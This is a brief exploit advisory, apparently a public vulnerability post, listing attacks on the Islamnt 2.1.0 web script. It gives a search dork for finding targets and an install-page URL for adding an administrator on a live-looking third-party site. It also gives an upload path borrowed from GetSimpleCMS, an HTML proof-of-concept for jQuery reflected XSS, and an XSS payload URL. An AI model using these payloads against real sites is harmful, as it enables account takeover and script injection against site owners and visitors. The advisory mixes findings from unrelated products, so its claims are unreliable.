script islamnt_2.1.0 multi Vulnerability ======================================== Author : indoushka Vondor : http://www.islamnt.net/ Dork: Powered By Islamnt 2.1.0 ================================================== Add ADmin : http://islamnew.eb2a.com/islam/install/?action=setup7 upload : http://127.0.0.1/GetSimpleCMS/admin/template/js/uploadify/uploadify.swf XSS Reflected - Jquery v1.7.1 : <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery v1.7.1 </title> <script src="http://127.0.0.1/instal/js/jquery.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert(&#x27;xss reflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option> </select> </p> </form> </body> </html> Xss : http://127.0.0.1/instal/onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3E Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================